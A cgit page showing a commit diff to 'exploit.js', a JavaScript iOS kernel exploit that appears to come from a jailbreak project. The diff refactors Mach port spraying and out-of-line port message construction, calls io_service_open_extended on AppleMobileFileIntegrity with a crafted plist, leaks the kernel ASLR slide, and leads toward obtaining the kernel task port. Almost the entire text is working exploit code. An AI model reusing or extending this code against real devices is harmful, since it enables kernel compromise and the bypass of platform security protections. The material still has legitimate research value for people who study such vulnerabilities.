summaryrefslogtreecommitdiff
path: root/src/js/kexp/exploit.js
diff options
context:
space:
mode:
Diffstat (limited to 'src/js/kexp/exploit.js')
-rwxr-xr-xsrc/js/kexp/exploit.js92
1 files changed, 32 insertions, 60 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 544a876..c667dd2 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -105,24 +105,28 @@ function copyinPort(kport, cnt) {
var data = malloc(4);
var master = malloc(4);
fakeportData = malloc(4);
+ var host_self = mach_host_self();
host_get_io_master(mach_host_self(), master);
ret = spray_data(NULL, 0, 5, data);
printf("sprayed, still here\n");
printf("spray_data=%d (%s)\n", ret, mach_error_string(ret));
printf("sprayed, still here\n");
+// printf("%x %x\n", master, read_u32(master));
service = IOServiceGetMatchingService(read_u32(master), IOServiceMatching("AppleMobileFileIntegrity"));
printf("service=%x\n", service);
var tst = sptr("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
+ printf("%x\n", tst);
var kpbuf = tst + 4;
for (var i = 0; i < cnt; i++) {
write_buf(kpbuf + (i * kport_size), read_buf(kport + (i * kport_size), kport_size), kport_size);
}
var err = malloc(4);
- var xml = sptr("<plist><dict><key>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</key><integer size=\"512\">1768515945</integer></dict></plist>");
- ret = io_service_open_extended(service, self, 0, 0, 1, xml, strlen(xml) + 1, err, client);
+ var xmls = "<plist><dict><key>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</key><integer size=\"512\">1768515945</integer></dict></plist>";
+ var xml = sptr(xmls);
+ ret = io_service_open_extended(service, self, 0, 0, 1, xml, xmls.length + 1, err, client);
printf("io_service_open_extended=%d (%s)\n", ret, mach_error_string(ret));
if (ret == KERN_SUCCESS) {
ret = read_u32(err);
@@ -132,7 +136,6 @@ function copyinPort(kport, cnt) {
var found = false;
var o = IOIteratorNext(read_u32(it));
- printf("%x\n", o);
while (o != MACH_PORT_NULL && !found) {
var buf = malloc(16 * 4);
@@ -141,13 +144,8 @@ function copyinPort(kport, cnt) {
ret = IORegistryEntryGetProperty(o, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", buf, size);
printf("%d %s\n", ret, mach_error_string(ret));
if (ret == KERN_SUCCESS) {
- printf("yolo\n");
-// mach_port_deallocate(self, read_u32(data));
-// write_u32(data, MACH_PORT_NULL);
spray_data(tst, strlen(tst) + 1, 10, fakeportData);
- printf("still still alive?\n");
kslide = (((read_u32(buf + (9 << 2)) & 0xFFF00000) + 0x1000) -0x80001000) >>> 0;
- printf("still alive? %x\n", 420);
printf("YOLO YOLO YOLO kaslr_slide=%s\n", kslide.toString(16));
found = true;
return ((read_u32(buf + (4 << 2)) - 0x78)) >>> 0;
@@ -202,7 +200,10 @@ function spray_ports(number_port_descs) {
mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp);
mach_port_insert_right(task_self, read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND);
- send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
+ var ret_ = send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
+
+// printf("%d (%s)\n", ret_, mach_error_string(ret_));
+
var ret = read_u32(mp);
free(mp);
return ret;
@@ -236,75 +237,46 @@ function send_ports(target, payload, num, number_port_descs) {
write_u32(init_port_set + (i << 2), payload);
}
- var buf = malloc(0x1c + (number_port_descs * 0xc * 8));
+ // var buf = malloc(0x1c + (number_port_descs * 0xc * 8));
- write_u32(buf + req_msgh_body_msgh_descriptor_count, number_port_descs);
+// write_u32(buf + req_msgh_body_msgh_descriptor_count, number_port_descs);
- var new_buf = new Uint32Array(3);
-// var tmp = u32_to_u8x4(init_port_set);
- new_buf[0] = (init_port_set);
- new_buf[1] = (num);
- new_buf[2] = ((19 << 24) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 16));
-
-// new_buf_.push(tmp[0]);
-// new_buf_.push(tmp[1]);
-// new_buf_.push(tmp[2]);
-// new_buf_.push(tmp[3]);
-// tmp = u32_to_u8x4(num);
-// new_buf_.push(tmp[0]);
-// new_buf_.push(tmp[1]);
-// new_buf_.push(tmp[2]);
-// new_buf_.push(tmp[3]);
-// new_buf_.push(0);
-// new_buf_.push(0);
-// new_buf_.push(MACH_MSG_OOL_PORTS_DESCRIPTOR);
-// new_buf_.push(19);
-
-// printf("%x 0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,\n", new_buf_.length, new_buf_[zz]]);
-
-// var new_buf = fast_array_mul(new_buf_, number_port_descs);
+// var buf = new Uint32Array((0x1c + (3 * number_port_descs)) / 4);
- for (var i = 0; i < number_port_descs; i++) {
- write_u32_buf(buf + req_init_port_set + (i * 0xc), new_buf, new_buf.length * 4);
- }
+ large_buf[req_msgh_body_msgh_descriptor_count / 4] = number_port_descs;
- /*
- for (var i = 0; i < number_port_descs; i++) {
- write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_address, init_port_set);
- write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_count, num);
- write_u8(buf + (req_init_port_set * (i + 1)) + 0x8, 0);
- write_u8(buf + (req_init_port_set * (i + 1)) + 0xa, 19);
- write_u8(buf + (req_init_port_set * (i + 1)) + 0xb, MACH_MSG_OOL_PORTS_DESCRIPTOR);
- }*/
+ var tmp = ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24));
- write_u32(buf + req_head_msgh_bits, 0x80001513); // MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE)
- write_u32(buf + req_head_msgh_request_port, target);
- write_u32(buf + req_head_msgh_reply_port, 0);
- write_u32(buf + req_head_msgh_id, 1337);
+ for (var i = 0; i < number_port_descs; i++) {
+ var tmp2 = (i * 3) + (req_init_port_set >>> 2);
+ large_buf[tmp2 + 0] = (init_port_set);
+ large_buf[tmp2 + 1] = (num);
+ large_buf[tmp2 + 2] = tmp;
+ }
- var ret = mach_msg(buf, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
+ large_buf[req_head_msgh_bits >>> 2] = 0x80001513; // MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE)
+ large_buf[req_head_msgh_request_port >>> 2] = target;
+ large_buf[req_head_msgh_reply_port >>> 2] = 0;
+ large_buf[req_head_msgh_id >>> 2] = 1337;
- free(buf);
+// printf("%s\n", prim_hexdump(read_buf(large_buf_ptr, 0x100)));
+
+ var ret = mach_msg(large_buf_ptr, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
return ret;
}
function release_port_ptrs(port) {
- printf("alive\n");
var req = malloc(0x1c + (5 * 0xc) + 0x8);
for (var i = 0; i < (0x1c + (5 * 0xc) + 0x8); i += 4) {
write_u32(req + i, 0x0);
}
printf("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0"));
- printf("alive\n");
var ret = mach_msg(req, MACH_RCV_MSG, 0, (0x1c + (5 * 0xc) + 0x8), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
- printf("alive\n");
- // if (ret != KERN_SUCCESS) {
-// printf("mach_recv %d %s\n", ret, mach_error_string(ret));
- printf("alive\n");
- // }
+ if (ret != KERN_SUCCESS) {
+ printf("mach_recv %d %s\n", ret, mach_error_string(ret));
+ }
free(req);
- printf("alive\n");
}
function get_kernel_task() {
@@ -335,7 +307,7 @@ function get_kernel_task() {
var big_buf = malloc(MIG_MAX);
var small_buf = malloc(MIG_MAX);
-
+
var big_size = malloc(4);
var small_size = malloc(4);
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 20:48:14 +0000